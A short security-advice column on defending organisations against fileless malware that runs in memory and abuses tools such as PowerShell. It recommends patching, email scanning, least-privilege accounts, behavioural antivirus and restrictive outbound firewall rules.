Maksim Kabakou - Fotolia

Security Think Tank: Patch, scan and lock down to counter fileless malware

What should organisations do at the very least to ensure business computers are protected from fileless malware?

We are nearly at the end of Q1, and wondering when those “upstairs” will suddenly come to life and worry about the GDPR deadline on 25th May. But in the meantime, we have other fish to fry, such as the growth of Fileless malware attacks and wondering how best to detect and defend against them.

Fileless malware, also known as non-malware, runs in memory and, unlike earlier “in memory” malware, does not leave a file footprint on a hard drive; their binaries and scripts are hidden in places where it is difficult to detect their presence such as the Operating Systems Registry.

The malicious activity execution is often done by exploiting existing system applications such as PowerShell, thus making detection even more difficult. However, a malware attack needs to get a bootstrapping binary into a computer in order for the “fileless malware” to be installed, and the malware itself will need to communicate back to its command and control point.

Protecting against a fileless malware attack

The first step is to ensure computer operating systems including any third party drivers and all the applications installed on a computer are fully patched up to date.

Also ensure any libraries are also maintained up to date, and this statement applies to all operating systems and applications – not just Microsoft. This advice applies to all types of organisation and should be done as one of the basic tasks. 

As a second step, emails should be scanned for malicious content, attachments and web links. Typically, this can be taken as a service either from your internet service provider (ISP) or a specialist third party. 

Third, user account should be set up on the basis of least privilege, and that means a normal user should only have “standard” privileges – not administrator privileges. Administrators themselves should have two accounts, a “standard” one for day to day tasks and one specifically for the administration of systems and the network.

Roles should also be established to limiting what users can access (e.g. a person in sales cannot access HR records) and file permissions set (e.g. the staff handbook, which likely is a sub-set of HR files, is made read-only to all staff). These basic steps will go a long way towards mitigating the ingress of malware, fileless or not, and help control any damage should malware get in.

What else can be done? Certainly run an antivirus product on all computers. It is recommended you install a version that can do behavioural system monitoring – not just signature evaluation.

For organisations, both small and large, ensure the internet connection is done via a good industry branded firewall – don’t just use a router’s firewall – and ensure outgoing traffic can only originate from systems on a demilitarised zone (DMZ) but as a minimum ensure any firewall rules limit outgoing connections to specific IP addresses or address range and specific port ranges.

For the larger organisations with deeper pockets, there are tools available that can monitor network behaviour and their use is recommended.

If you run a Microsoft network, also consider installing their Enhanced Mitigation Experience Toolkit, which will enforce protective restrictions on applications. Setting user roles and privileges and file permissions are all standard features of a Microsoft Network: use them.

Read more on Hackers and cybercrime prevention

Data Center
Data Management